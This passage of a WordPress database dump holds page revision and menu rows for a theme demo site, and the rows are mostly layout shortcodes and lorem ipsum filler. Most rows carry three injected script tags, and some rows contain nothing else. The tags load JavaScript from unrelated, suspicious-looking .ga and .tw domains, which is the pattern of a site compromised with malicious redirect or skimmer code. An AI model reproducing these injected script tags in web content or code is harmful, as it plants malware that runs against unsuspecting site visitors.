column_border_style=\"solid\"][nectar_blog layout=\"masonry-blog-full-screen-width\" blog_masonry_style=\"inherit\" category=\"news-and-event\" enable_pagination=\"true\" pagination_type=\"infinite_scroll\" load_in_animation=\"fade_in_from_bottom\" order=\"DESC\" orderby=\"date\" posts_per_page=\"10\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','News & Event','','inherit','closed','closed','','6235-revision-v1','','','2017-12-14 04:06:12','2017-12-14 04:06:12','',6235,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/6235-revision-v1/',0,'revision','',0),(6238,1,'2017-12-14 04:07:40','2017-12-14 04:07:40','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" id=\"blog\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_blog layout=\"masonry-blog-full-screen-width\" blog_masonry_style=\"inherit\" category=\"promo-of-the-month\" enable_pagination=\"true\" pagination_type=\"infinite_scroll\" load_in_animation=\"fade_in_from_bottom\" order=\"DESC\" orderby=\"date\" posts_per_page=\"10\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Promo of the Month','','inherit','closed','closed','','6236-revision-v1','','','2017-12-14 04:07:40','2017-12-14 04:07:40','',6236,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/6236-revision-v1/',0,'revision','',0),(6239,1,'2017-12-14 04:08:03','2017-12-14 04:08:03',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6239','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6239',101,'nav_menu_item','',0),(6240,1,'2017-12-14 04:08:03','2017-12-14 04:08:03',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6240','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6240',100,'nav_menu_item','',0),(6241,1,'2017-12-14 04:18:39','2017-12-14 04:18:39','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"9\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"accent-color-dark\"][testimonial image=\"36\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"37\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"38\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/blur.png\" bg_position=\"left top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"3%\" bottom_padding=\"325\" enable_gradient=\"true\" color_overlay=\"#ffffff\" gradient_direction=\"top_to_bottom\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">Design is the paradise</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">of individuality, eccentricity,</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">abnormality, and humors.</span></h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" top_padding=\"15\" bottom_padding=\"25\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]We\'re Salient, a creative agency located in the heart of New York city. We pride ourselves on developing unique and professional solutions with a wide variety of mediums. Take a look around and don\'t be shy.[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6 style=\"color: #1e83ec;\">What we can help you achieve</h6>\r\n<span style=\"color: rgba(0,0,0,0.45);\">Personal or corporate branding | SEO optimization | Web &amp; UI Design | Standing out in the crowd</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_blog layout=\"masonry-blog-fullwidth\" blog_masonry_style=\"inherit\" category=\"music\" load_in_animation=\"none\" order=\"DESC\" orderby=\"date\" posts_per_page=\"1\"][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"none\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_blog layout=\"masonry-blog-fullwidth\" blog_masonry_style=\"inherit\" category=\"food-for-thought\" load_in_animation=\"none\" order=\"DESC\" orderby=\"date\" posts_per_page=\"1\"][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"none\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][nectar_blog layout=\"masonry-blog-fullwidth\" blog_masonry_style=\"inherit\" category=\"fashion\" load_in_animation=\"none\" order=\"DESC\" orderby=\"date\" posts_per_page=\"1\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"top-bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1512922781747{border-top-width: 1px !important;padding-top: 10% !important;border-top-color: rgba(255,255,255,0.11) !important;border-top-style: solid !important;}\"]\r\n<h2>Build a Beautiful Website</h2>\r\n<h5><span style=\"color: #bbbbbb;\">here</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2017-12-14 04:18:39','2017-12-14 04:18:39','',5,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/5-revision-v1/',0,'revision','',0),(6242,1,'2017-12-14 04:19:22','2017-12-14 04:19:22','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"9\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" 